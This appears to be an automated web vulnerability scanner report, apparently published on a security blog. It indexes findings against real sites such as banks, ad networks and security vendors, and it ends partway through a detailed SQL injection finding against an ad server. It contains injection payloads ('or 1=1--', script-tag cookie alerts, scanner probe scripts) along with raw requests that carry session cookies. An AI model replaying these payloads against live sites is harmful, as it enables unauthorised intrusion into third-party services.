20.14. http://googleads.g.doubleclick.net/pagead/ads

20.15. http://googleads.g.doubleclick.net/pagead/ads

20.16. http://googleads.g.doubleclick.net/pagead/ads

20.17. http://googleads.g.doubleclick.net/pagead/ads

20.18. http://googleads.g.doubleclick.net/pagead/ads

20.19. http://googleads.g.doubleclick.net/pagead/ads

20.20. http://googleads.g.doubleclick.net/pagead/ads

20.21. http://googleads.g.doubleclick.net/pagead/ads

20.22. http://googleads.g.doubleclick.net/pagead/ads

20.23. http://googleads.g.doubleclick.net/pagead/ads

20.24. http://googleads.g.doubleclick.net/pagead/ads

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://googleads.g.doubleclick.net/pagead/ads

20.28. http://googleads.g.doubleclick.net/pagead/ads

20.29. http://ib.adnxs.com/ab

20.30. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

20.31. https://login.yahoo.com/config/login

20.32. http://nuclearpesticide.com/

20.33. https://olui2.fs.ml.com/login/login.aspx

20.34. http://response.firstdata.com/

20.35. http://shots.snap.com/rk.php

20.36. https://store.tenable.com/

20.37. https://store.tenable.com/index.php

20.38. http://threats2.paretologic.revenuewire.net/pcha/download

20.39. http://www.afreshbunch.com/

20.40. http://www.backbonesecurity.com/interior.cfm

20.41. https://www.bankofamerica.com/credit-cards/cardoverview.action

20.42. https://www.bankofamerica.com/deposits/cds-iras.go

20.43. https://www.bankofamerica.com/deposits/checking-accounts.go

20.44. https://www.bankofamerica.com/deposits/savings-accounts.go

20.45. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go

20.46. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go

20.47. https://www.bankofamerica.com/homepage/WidgetAction.go

20.48. https://www.bankofamerica.com/homepage/overview.go

20.49. https://www.bankofamerica.com/hub/index.action

20.50. http://www.bing.com/search

20.51. http://www.bing.com/search

20.52. http://www.bing.com/search

20.53. http://www.clone-systems.com/ecommerce/cart.php

20.54. http://www.clone-systems.com/ecommerce/javascript/product.js

20.55. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php

20.56. http://www.facebook.com/plugins/like.php

20.57. http://www.genbook.com/bookings/booknowjstag.action

20.58. http://www.nuclearpesticide.com/

20.59. http://www.onestoppciscan.com/

20.60. http://www.saintcorporation.com/products/saas/webSaintPro.html

21. Cross-domain script include

21.1. https://account.snap.com/signup.php

21.2. http://ad.amgdgt.com/ads/

21.3. http://afreshbunch.com/

21.4. http://afreshbunch.com/

21.5. http://afreshbunch.com/about.htm

21.6. http://afreshbunch.com/forums/

21.7. http://afreshbunch.com/forums/images/x.gif

21.8. http://downloads.yahoo.com/freeware

21.9. http://downloads.yahoo.com/linux

21.10. http://downloads.yahoo.com/mobile

21.11. http://downloads.yahoo.com/windows

21.12. http://downloads.yahoo.com/windows/desktop-enhancements/virtual-desktop

21.13. http://downloads.yahoo.com/windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305

21.14. http://googleads.g.doubleclick.net/pagead/ads

21.15. http://googleads.g.doubleclick.net/pagead/ads

21.16. http://googleads.g.doubleclick.net/pagead/ads

21.17. http://learn.bankofamerica.com/

21.18. https://login.yahoo.com/config/login

21.19. http://nuclearpesticide.com/

21.20. https://olui2.fs.ml.com/login/login.aspx

21.21. http://response.firstdata.com/

21.22. https://securitymetrics.com/pricelist.adp

21.23. https://securitymetrics.com/sitecertinfo.adp

21.24. https://securitymetrics.com/sm/PANscan/

21.25. https://securitymetrics.com/sm/determinesaq/terminaltype

21.26. https://store.tenable.com/

21.27. https://store.tenable.com/index.php

21.28. https://support.tenable.com/support-center/

21.29. http://www.abaca.com/

21.30. http://www.abaca.com/search.js

21.31. http://www.afreshbunch.com/

21.32. http://www.afreshbunch.com/

21.33. http://www.backbonesecurity.com/interior.cfm

21.34. http://www.cleanallspyware.com/

21.35. http://www.clone-systems.com/ecommerce/cart.php

21.36. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/

21.37. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

21.38. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/

21.39. http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html

21.40. http://www.clone-systems.com/pci-scanning.html

21.41. https://www.clone-systems.com/ecommerce/checkout.php

21.42. http://www.comodo.com/business-security/pci-compliance/pci-scan.php

21.43. http://www.comodo.com/contact-comodo/contact-us.php

21.44. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php

21.45. http://www.comodo.com/support/comodo-support.php

21.46. http://www.facebook.com/plugins/like.php

21.47. http://www.genbook.com/bookings/booknowjstag.action

21.48. https://www.hackerguardian.com/

21.49. https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html

21.50. https://www.hackerguardian.com/javascript/functions.js

21.51. https://www.hackerguardian.com/ssl-certificate-products/ssl-certificate-index.html

21.52. http://www.hugthecloud.com/

21.53. https://www.instantssl.com/

21.54. https://www.instantssl.com/ssl-certificate-products/

21.55. http://www.is3.com/about/af-support-form.do

21.56. http://www.is3.com/about/contactUs.do

21.57. http://www.is3.com/products/antifraud/Affiliates.do

21.58. http://www.is3.com/products/antifraud/BizDev.do

21.59. http://www.is3.com/products/antifraud/Bulk-Licensing.do

21.60. http://www.is3.com/products/antifraud/Reseller.do

21.61. http://www.is3.com/products/antifraud/home.do

21.62. http://www.is3.com/support/antifraud/home.do

21.63. http://www.m8security.com/

21.64. http://www.m8security.com/m8secure-signup

21.65. http://www.m8security.com/managed-security

21.66. http://www.m8security.com/sites/all/themes/m8security/images/bottom_bg.gif

21.67. http://www.m8security.com/sites/all/themes/m8security/images/header.jpg

21.68. http://www.m8security.com/support

21.69. http://www.merrilledge.com/m/pages/global-oao.aspx

21.70. https://www.merrilledge.com/m/pages/global-oao.aspx

21.71. https://www.merrilledge.com/m/pages/home.aspx

21.72. http://www.nuclearpesticide.com/

21.73. http://www.saintcorporation.com/products/order.html

21.74. http://www.saintcorporation.com/products/saas/webSaintPro.html

22. File upload functionality

23. TRACE method is enabled

23.1. http://109.xg4ken.com/

23.2. https://account.snap.com/

23.3. http://bridgefront.com/

23.4. http://firstdata.122.2o7.net/

23.5. http://login.sisna.com/

23.6. https://shots-s.snap.com/

23.7. http://shots.snap.com/

23.8. http://support.sentrigo.com/

23.9. https://support.sentrigo.com/

23.10. http://widgets.digg.com/

23.11. http://www.actividentity.com/

23.12. http://www.genbook.com/

23.13. http://www.hipaarx.net/

23.14. http://www.hipaasecurityrx.net/

23.15. http://www.saintcorporation.com/

23.16. https://www.saintcorporation.com/

24. Email addresses disclosed

24.1. https://account.snap.com/signup.php

24.2. http://blog.ikano.com/

24.3. http://blog.ikano.com/favicon.ico

24.4. http://blog.ikano.com/wp-content/themes/WP_Premium/WP_Premium/taber.js

24.5. http://bridgefront.com/products_custom_course_development.php

24.6. http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js

24.7. http://freemarker.com/top.php

24.8. http://ikano.com/

24.9. http://ikano.com/contact.asp

24.10. http://ikano.com/favicon.ico

24.11. http://ikano.com/press/dslextremepress.asp

24.12. http://ikano.com/press/dslextremepress2.asp

24.13. http://ikano.com/press/referralagent.asp

24.14. http://ikano.com/press/serverhuggerpress.asp

24.15. http://learn.bridgefront.com/intro/

24.16. https://login.yahoo.com/config/login

24.17. http://mydownload.paretologic.revenuewire.net/pcha/homepage

24.18. https://secure.comodo.com/management/passwordResetRequest.html

24.19. https://securitymetrics.com/sm/determinesaq/storechd

24.20. https://securitymetrics.com/sm/determinesaq/terminaltype

24.21. https://securitymetrics.com/static/js/controls.js

24.22. https://store.tenable.com/

24.23. https://store.tenable.com/includes/general.js

24.24. https://store.tenable.com/includes/templates/tenable/jscript/jquery.hoverIntent.min.js

24.25. https://store.tenable.com/includes/templates/tenable/jscript/jscript_imagehover.js

24.26. https://store.tenable.com/index.php

24.27. https://support.sentrigo.com/

24.28. https://support.sentrigo.com/User/Login

24.29. https://support.sentrigo.com/js/general/common.js

24.30. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/js/jquery.hoverIntent.min.js

24.31. http://threats2.paretologic.revenuewire.net/pcha/download

24.32. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_ScriptDOM.js

24.33. https://www.bankofamerica.com/www/en_US/global/mvc_objects/flyout/HM_ScriptDOM.js

24.34. http://www.bridgefront.com/

24.35. http://www.bridgefront.com/cart/

24.36. http://www.bridgefront.com/contactus.php

24.37. http://www.bridgefront.com/solutions_education_revenue.php

24.38. http://www.bridgefront.net/

24.39. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js

24.40. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js

24.41. https://www.clone-systems.com/ecommerce/checkout.php

24.42. http://www.comodo.com/contact-comodo/contact-us.php

24.43. http://www.comodo.com/js/lib/jquery.dimensions.js

24.44. http://www.comodo.com/js/lib/jquery.hoverIntent.minified.js

24.45. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11

24.46. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11

24.47. http://www.firstdata.com/fdc_site/_scripts/lib/jquery.xml2json.pack.js

24.48. http://www.firstdata.com/fdc_site/_styles/screen.css

24.49. https://www.fs.ustrust.com/CLUIResources/scripts/UIControls.CLUICommon.js

24.50. https://www.fs.ustrust.com/login/login.aspx

24.51. http://www.hipaarx.net/

24.52. http://www.hipaarx.net/contactus.php

24.53. http://www.hipaasecurityrx.net/

24.54. http://www.is3.com/about/af-support-form.do

24.55. http://www.is3.com/about/contactUs.do

24.56. http://www.is3.com/products/antifraud/BizDev.do

24.57. http://www.is3.com/products/antifraud/Bulk-Licensing.do

24.58. http://www.is3.com/products/antifraud/Reseller.do

24.59. http://www.onestoppciscan.com/contact.html

24.60. http://www.saintcorporation.com/products/order.html

24.61. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl

25. Private IP addresses disclosed

25.1. http://afreshbunch.com/

25.2. http://afreshbunch.com/about.htm

25.3. http://afreshbunch.com/forums/

25.4. http://afreshbunch.com/forums/images/x.gif

25.5. http://player.vimeo.com/config/14606948

25.6. http://vimeo.com/moogaloop.swf

25.7. http://www.afreshbunch.com/

25.8. http://www.facebook.com/extern/login_status.php

25.9. http://www.facebook.com/extern/login_status.php

25.10. http://www.facebook.com/extern/login_status.php

25.11. http://www.facebook.com/extern/login_status.php

25.12. http://www.facebook.com/plugins/like.php

25.13. http://www.google.com/sdch/rU20-FBA.dct

26. Credit card numbers disclosed

26.1. http://www.bing.com/search

26.2. http://www.bing.com/search

26.3. http://www.bing.com/search

27. Robots.txt file

27.1. http://172-vim-170.mktoresp.com/webevents/visitWebPage

27.2. https://account.snap.com/signup.php

27.3. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

27.4. http://bridgefront.com/products_custom_course_development.php

27.5. http://clients1.google.com/complete/search

27.6. http://data.cmcore.com/cookie-id.js

27.7. http://data.coremetrics.com/cm

27.8. http://firstdata.122.2o7.net/b/ss/firstdataprod/1/H.20.3/s97121651181951

27.9. http://fls.doubleclick.net/activityi

27.10. http://fonts.googleapis.com/css

27.11. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

27.12. https://m8security.foxycart.com/files/foxycart_includes.js

27.13. http://maps.google.com/maps

27.14. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.15. http://pixel.quantserve.com/pixel

27.16. http://realestatecenter.bankofamerica.com/RePortal/homepage.aspx

27.17. http://response.firstdata.com/

27.18. http://s7.addthis.com/js/250/addthis_widget.js

27.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYj_8CIJD_AioFkL8AAAEyBY-_AAAB

27.20. http://safebrowsing.clients.google.com/safebrowsing/downloads

27.21. https://secure.comodo.com/management/passwordResetRequest.html

27.22. https://secure.comodo.net/ttb_searcher/trustlogo

27.23. https://secure.eloqua.com/visitor/v200/svrGP.aspx

27.24. https://shots-s.snap.com/snap_shots.js

27.25. http://shots.snap.com/snap_shots.js

27.26. http://sofa.bankofamerica.com/eluminate

27.27. https://store.tenable.com/index.php

27.28. http://themes.googleusercontent.com/font

27.29. http://tools.google.com/service/update2

27.30. http://widgets.digg.com/buttons/count

27.31. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

27.32. http://www.bankofamerica.com/adtrack/index.cgi

27.33. https://www.bankofamerica.com/

27.34. http://www.bizographics.com/collect/

27.35. https://www.clone-systems.com/ecommerce/checkout.php

27.36. https://www.comodo.com/login/comodo-members.php

27.37. http://www.genbook.com/bookings/booknowjstag.action

27.38. http://www.google.com/aclk

27.39. http://www.googleadservices.com/pagead/aclk

27.40. https://www.hackerguardian.com/

27.41. http://www.merrilledge.com/m/pages/global-oao.aspx

27.42. https://www.merrilledge.com/m/pages/home.aspx

27.43. http://www.saintcorporation.com/products/saas/webSaintPro.html

27.44. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl

28. Cacheable HTTPS response

28.1. https://account.snap.com/favicon.ico

28.2. https://account.snap.com/javascript/jquery.js

28.3. https://account.snap.com/javascript/prototype.1.6.1.0.js

28.4. https://account.snap.com/javascript/tab.js

28.5. https://olui2.fs.ml.com/publish/content/environment/environment.xml

28.6. https://secure.comodo.com/management/passwordResetRequest.html

28.7. https://secure.comodo.com/products/!hostedLogin

28.8. https://secure.opinionlab.com/

28.9. https://secure.opinionlab.com/ccc01/comment_card.asp

28.10. https://secure.opinionlab.com/ccc01/comment_card_d.asp

28.11. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

28.12. https://securitymetrics.com/

28.13. https://securitymetrics.com/login.adp

28.14. https://securitymetrics.com/pricelist.adp

28.15. https://securitymetrics.com/register_home.adp

28.16. https://securitymetrics.com/sitecertinfo.adp

28.17. https://securitymetrics.com/sm/PANscan/

28.18. https://securitymetrics.com/sm/determinesaq/storechd

28.19. https://securitymetrics.com/sm/determinesaq/terminaltype

28.20. https://shots-s.snap.com/snap_shots.js

28.21. https://support.sentrigo.com/favicon.ico

28.22. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/img/favicon.ico

28.23. https://www.comodo.com/login/comodo-members.php

28.24. https://www.hackerguardian.com/

28.25. https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html

28.26. https://www.hackerguardian.com/ssl-certificate-products/ssl-certificate-index.html

28.27. https://www.instantssl.com/

28.28. https://www.instantssl.com/ssl-certificate-products/

28.29. https://www.mavitunasecurity.com/download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV

28.30. https://www.mavitunasecurity.com/support/checkupdate/

28.31. https://www.merrilledge.com/M/ScriptResource.axd

28.32. https://www.merrilledge.com/m/pages/home.aspx

28.33. https://www.merrilledge.com/publish/OSE/XML/MLTextChat.xml

28.34. https://www.mysecureconnect.com/favicon.ico

28.35. https://www.mysecureconnect.com/login.aspx

28.36. https://www.net-address.co.uk/manager.asp

28.37. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl

28.38. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl

28.39. https://www.saintcorporation.com/favicon.ico

29. Multiple content types specified

29.1. http://learn.bridgefront.com/help/dhtml_search.js

29.2. http://translate.googleapis.com/translate_static/js/element/main.js

30. HTML does not specify charset

30.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

30.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.3. http://cleanallspyware.com/Spam

30.4. http://fls.doubleclick.net/activityi

30.5. http://ikano.com/

30.6. http://ikano.com/contact.asp

30.7. http://ikano.com/favicon.ico

30.8. http://ikano.com/press/dslextremepress.asp

30.9. http://ikano.com/press/dslextremepress2.asp

30.10. http://ikano.com/press/referralagent.asp

30.11. http://ikano.com/press/serverhuggerpress.asp

30.12. https://landingpage.leads.dynamicssite.com/PostLead.aspx

30.13. http://now.eloqua.com/visitor/v200/svrGP.aspx

30.14. http://pixel.intellitxt.com/pixel.jsp

30.15. https://secure.comodo.com/management/passwordResetRequest.html

30.16. http://spamlaws.us.intellitxt.com/iframescript.jsp

30.17. http://www.backbonesecurity.com/favicon.ico

30.18. http://www.directbrand.com/tracking202/static/landing.php

30.19. http://www.directbrand.com/tracking202/static/record.php

30.20. https://www.fs.ustrust.com/login/login.aspx

30.21. https://www.fs.ustrust.com/login/login.aspx'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

30.22. https://www.fs.ustrust.com/login/login.aspx/%22ns=%22netsparker(0x000011)

30.23. https://www.fs.ustrust.com/login/login.aspx/%2522ns%253D%2522netsparker%25280x000012%2529)

30.24. http://www.onestoppciscan.com/contact.html

30.25. http://www.saintcorporation.com/cgi-bin/shopcart/cart.pl

30.26. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl

30.27. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl

30.28. http://www.secureconnect.com/rssReplayProxy.php

31. HTML uses unrecognised charset

31.1. https://secure.opinionlab.com/ccc01/comment_card.asp

31.2. https://secure.opinionlab.com/ccc01/comment_card_d.asp

31.3. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

32. Content type incorrectly stated

32.1. http://172-vim-170.mktoresp.com/favicon.ico

32.2. https://account.snap.com/favicon.ico

32.3. https://account.snap.com/javascript/jquery.js

32.4. https://account.snap.com/javascript/prototype.1.6.1.0.js

32.5. https://account.snap.com/javascript/tab.js

32.6. http://ar.voicefive.com/b/rc.pli

32.7. http://bridgefront.com/favicon.ico

32.8. http://cleanallspyware.com/favicon.ico

32.9. http://event.adxpose.com/event.flow

32.10. http://i.ixnp.com/shot_main_js/v6.59/

32.11. https://landingpage.leads.dynamicssite.com/PostLead.aspx

32.12. http://learn.bridgefront.com/favicon.ico

32.13. http://login.sisna.com/login_multiple/

32.14. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.15. http://pixel.intellitxt.com/pixel.jsp

32.16. http://response.firstdata.com/favicon.ico

32.17. http://secure.comodo.com/products/guessregion

32.18. https://shots-s.snap.com/snap_shots.js

32.19. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

32.20. http://shots.snap.com/asj/v1/spakey/1797024321/auto_shot.js

32.21. http://shots.snap.com/snap_shots.js

32.22. https://support.sentrigo.com/favicon.ico

32.23. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/img/favicon.ico

32.24. http://verify.authorize.net/anetseal/images/secure90x72.gif

32.25. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

32.26. http://www.bankofamerica.com/favicon.ico

32.27. http://www.bankofamerica.com/global/images/new_Banklogo.gif

32.28. https://www.bankofamerica.com/homepage/WidgetAction.go

32.29. https://www.bankofamerica.com/homepage/overview

32.30. http://www.bridgefront.com/favicon.ico

32.31. http://www.cleanallspyware.com/favicon.ico

32.32. http://www.directbrand.com/tracking202/static/landing.php

32.33. http://www.directbrand.com/tracking202/static/record.php

32.34. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-black-webfont.woff

32.35. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-bold-webfont.woff

32.36. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-light-webfont.woff

32.37. https://www.mavitunasecurity.com/support/checkupdate/

32.38. http://www.saintcorporation.com/favicon.ico

32.39. https://www.saintcorporation.com/favicon.ico

32.40. http://www.secureconnect.com/rssReplayProxy.php

33. Content type is not specified

33.1. http://cf.addthis.com/favicon.ico

33.2. https://securitymetrics.com/sm/PANscan/

33.3. https://securitymetrics.com/sm/determinesaq/storechd

33.4. https://securitymetrics.com/sm/determinesaq/terminaltype



1. SQL injection  next
There are 33 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The client parameter appears to be vulnerable to SQL injection attacks. The payloads 85094699'%20or%201%3d1--%20 and 85094699'%20or%201%3d2--%20 were each submitted in the client parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d1--%20&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:37:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 862

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/206/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d1--%20&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d2--%20&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:37:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 849

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/206/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d2--%20&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

1.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

